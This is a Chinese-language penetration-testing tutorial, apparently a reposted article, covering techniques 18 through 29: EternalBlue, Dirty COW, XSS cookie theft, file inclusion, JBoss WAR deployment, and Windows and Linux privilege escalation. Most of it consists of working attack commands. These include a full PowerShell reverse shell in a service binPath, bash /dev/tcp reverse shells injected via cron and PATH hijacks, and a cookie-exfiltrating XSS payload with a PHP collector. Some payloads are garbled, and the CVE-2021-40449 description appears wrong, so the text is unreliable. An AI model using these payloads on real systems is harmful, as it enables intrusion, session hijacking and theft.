30个渗透实战技巧从弱口令爆破到权限提升全攻略！

2025-12-22 04:03:15 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 这是一篇渗透测试实战技巧指南，涵盖弱口令爆破、信息收集、漏洞利用和权限提升四个方面。文章提供了30个具体技巧，包括SSH、RDP、Web后台等弱口令爆破方法，端口扫描、子域名枚举等信息收集技术，SQL注入、文件上传、命令注入等漏洞利用手段，以及Windows和Linux系统的多种提权方法。每个技巧都配有具体工具使用方法和实战命令，旨在帮助安全从业者提升渗透测试能力。 综合评分： 89 文章分类： 渗透测试,红队,内网渗透

技巧 18：Windows MS17-010 漏洞利用 —— 永恒之蓝

• 漏洞影响：Windows XP/7/Server 2003/2008，可远程执行命令，获取系统权限。
• 工具选择：Metasploit（MSF）、永恒之蓝漏洞利用工具（ EternalBlue-Exploit）。
• MSF 实战步骤：

1. 启动 MSF：msfconsole；
2. 加载模块：use exploit/windows/smb/ms17_010_eternalblue；
3. 配置参数：set RHOSTS [目标IP]、set LHOST [攻击机IP]；
4. 执行攻击：run，若成功，获取 SYSTEM 权限的 Meterpreter 会话。

• 风险提示：该漏洞利用会导致目标系统蓝屏重启，需提前告知目标方，避免业务中断。

技巧 19：Linux Dirty COW 漏洞利用 —— 内核提权（补充）

• 漏洞影响：Linux 内核 2.6.22-3.9，可通过修改 SUID 文件实现提权（CVE-2016-5195）。
• 实战步骤：

1. 检测漏洞：执行uname -r查看内核版本，若在受影响范围，继续；
2. 下载利用脚本：wget ``https://github.com/FireFart/dirtycow/raw/master/dirty.c；
3. 编译执行：gcc -pthread dirty.c -o dirty -lcrypt、./dirty，输入新密码（如 “123456”）；
4. 切换 root 用户：su firefart，输入新密码，成功获取 root 权限。

• 注意点：该漏洞已在大多数 Linux 发行版中修复，仅适用于未更新内核的老旧系统。

技巧 20：XSS 漏洞利用 —— 获取 Cookie 与会话劫持

• 漏洞类型：存储型 XSS（漏洞代码存储在数据库，如评论区）、反射型 XSS（漏洞代码仅在当前请求中生效，如搜索框）。
• 存储型 XSS 实战：

1. 在评论区输入 `.location.href=’http://[攻击机 IP]/xss.php?cookie=’+document.cookie
2. 在攻击机创建 xss.php，内容为$cookie = $_GET['cookie']; file_put_contents('cookie.txt', $cookie."\n", FILE_APPEND);?>；
3. 当管理员访问评论区时，其 Cookie 会被发送到攻击机的 cookie.txt，用该 Cookie 替换本地 Cookie，即可劫持管理员会话。

• 防御绕过：若目标过滤，尝试用=x onerror=alert(document.cookie)>、 onload=alert (1)>` 等标签绕过。

技巧 21：文件包含漏洞利用 —— 加载恶意代码

• 漏洞判断：Web 参数中包含文件路径（如?file=index.php），尝试修改为?file=../../etc/passwd（Linux）或?file=c:/windows/system32/drivers/etc/hosts（Windows），若能读取系统文件，则存在文件包含漏洞。
• 利用方法：

1. 本地文件包含（LFI）：读取敏感文件，如?file=../../var/www/html/config.php获取数据库密码；
2. 远程文件包含（RFI）：若allow_url_include=On，加载远程恶意文件，如?file=http://[攻击机IP]/malicious.txt（malicious.txt 内容为php system('whoami');?>）。

• 绕过技巧：若目标限制路径，尝试../变形（如..././）、编码（如 URL 编码../为%2e%2e%2f）。

技巧 22：中间件 JBoss 漏洞利用 —— 获取 Webshell

• JBoss 默认端口：8080，常见漏洞为 “JBoss 4.x JMX Console 未授权访问”。
• 实战步骤：

1. 访问http://[目标IP]:8080/jmx-console/，若无需登录即可进入，存在漏洞；
2. 搜索 “jboss.web.deployment”，点击 “deploy” 方法；
3. 在 “warUrl” 参数中输入远程 War 包地址（如http://[攻击机IP]/shell.war，shell.war 为恶意 War 包），点击 “Invoke” 部署；
4. 访问http://[目标IP]:8080/shell/，获取 Webshell。

• 补充：JBoss 7.x + 版本默认关闭 JMX Console，需通过其他漏洞（如 CVE-2017-12149）利用。

第四部分：权限提升实战技巧

获取初始权限后（如 Webshell、普通用户权限），需通过权限提升获取系统最高权限（Windows SYSTEM、Linux root），完成渗透测试目标。

技巧 23：Windows 服务权限配置错误提权

• 漏洞原理：若普通用户对系统服务的 “binPath”（执行路径）有修改权限，可将路径改为恶意程序，重启服务后执行恶意代码。
• 实战步骤：

1. 查看可修改的服务：用sc qc 服务名（如sc qc WuAuServ）查看服务权限，若 “USER” 为当前普通用户，或 “权限” 包含 “WRITE_OWNER”，则可修改；
2. 修改服务路径：sc config 服务名 binPath= "cmd.exe /c powershell -nop -exec bypass -c \"$client = New-Object ``System.Net``.Sockets.TCPClient('攻击机IP',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}\""注意：binPath=后有空格，命令需用双引号包裹；
3. 重启服务：sc stop 服务名、sc start 服务名，攻击机nc -lvp 8888接收 SYSTEM 权限 shell。

技巧 24：Windows 令牌窃取提权 ——Incognito

• 工具选择：Meterpreter 会话中的 Incognito 模块，用于窃取系统令牌（Token）。
• 实战步骤：

1. 进入 Meterpreter 会话：meterpreter > use incognito；
2. 列出可用令牌：meterpreter > list_tokens -u，查看是否有 “NT AUTHORITY\SYSTEM” 令牌；
3. 窃取令牌：meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"，若成功，当前用户变为 SYSTEM；
4. 验证权限：meterpreter > getuid，输出 “Server username: NT AUTHORITY\SYSTEM”。

• 注意点：若目标开启 “UAC”（用户账户控制），普通用户无法直接窃取 SYSTEM 令牌，需先绕过 UAC（如利用 CVE-2021-40449）。

技巧 25：Windows UAC 绕过提权 ——CVE-2021-40449

• 漏洞影响：Windows 10 1809-21H1、Windows Server 2019，利用 MSHTML 组件漏洞绕过 UAC。
• MSF 实战步骤：

1. 加载模块：use exploit/windows/local/cve_2021_40449_microsoft_mshtml_uac_bypass；
2. 配置参数：set SESSION [当前Meterpreter会话ID]、set LHOST [攻击机IP]；
3. 执行绕过：run，若成功，获取高权限 Meterpreter 会话，getuid显示 “NT AUTHORITY\SYSTEM”。

技巧 26：Linux SUID 提权 —— 利用高权限命令

• SUID 原理：设置 SUID 权限的命令，执行时会以命令所有者（通常为 root）的权限运行，若普通用户可执行该命令，可通过命令参数实现提权。
• 实战步骤：

1. 查找 SUID 命令：find / -perm -u=s -type f 2>/dev/null，常见可提权的 SUID 命令有 find、cp、cat、bash；
2. find 提权：find /tmp -name test -exec /bin/sh -p {} \;，若 find 有 SUID 权限，执行后会生成 root 权限的 shell；
3. bash 提权：/bin/bash -p，若 bash 有 SUID 权限，执行后直接进入 root shell。

• 验证权限：执行id，若输出 “uid=0 (root)”，说明提权成功。

技巧 27：Linux sudo 配置错误提权 ——sudo -l

• sudo -l 作用：查看当前用户可通过 sudo 执行的命令，若命令无需输入密码且可执行系统命令，可实现提权。
• 常见可提权命令：
• 若sudo -l显示 “(ALL) NOPASSWD: /usr/bin/find”，则执行sudo find /tmp -name test -exec /bin/sh {} \;；
• 若显示 “(ALL) NOPASSWD: /usr/bin/cp”，则执行sudo cp /etc/shadow /tmp/shadow（读取 shadow 文件，破解 root 密码）；
• 若显示 “(ALL) NOPASSWD: /bin/bash”，则直接执行sudo bash，进入 root shell。

技巧 28：Linux 计划任务提权 —— 修改任务脚本

• 计划任务路径：/etc/crontab（系统级计划任务）、/var/spool/cron/root（root 用户计划任务）。
• 实战步骤：

1. 查看计划任务：cat /etc/crontab，若发现 root 用户定期执行的脚本（如*/5 * * * * root /home/user/``backup.sh）；
2. 检查脚本权限：ls -l /home/user/``backup.sh，若普通用户有写入权限（如 “-rwxrwxrwx”）；
3. 修改脚本：echo "/bin/bash -i >& /dev/tcp/[攻击机IP]/8888 0>&1" >> /home/user/``backup.sh；
4. 等待计划任务执行：攻击机nc -lvp 8888，5 分钟后接收 root 权限 shell。

技巧 29：Linux 环境变量提权 —— 覆盖系统命令

• 漏洞原理：若计划任务或 SUID 命令执行的是相对路径（如./``test.sh），而非绝对路径（如/usr/bin/``test.sh），普通用户可通过修改环境变量（PATH），让系统优先执行恶意命令。
• 实战步骤：

1. 查看计划任务：cat /etc/crontab，发现 “*/1 * * * * root test.sh”（test.sh 中执行ls命令，且用相对路径）；
2. 创建恶意 ls 命令：echo "/bin/bash -i >& /dev/tcp/[攻击机IP]/8888 0>&1" > /tmp/ls，chmod +x /tmp/ls；
3. 修改环境变量：export PATH=/tmp:$PATH（让系统优先从 /tmp 目录找 ls 命令）；
4. 等待计划任务执行：攻击机监听 8888 端口，接收 root shell。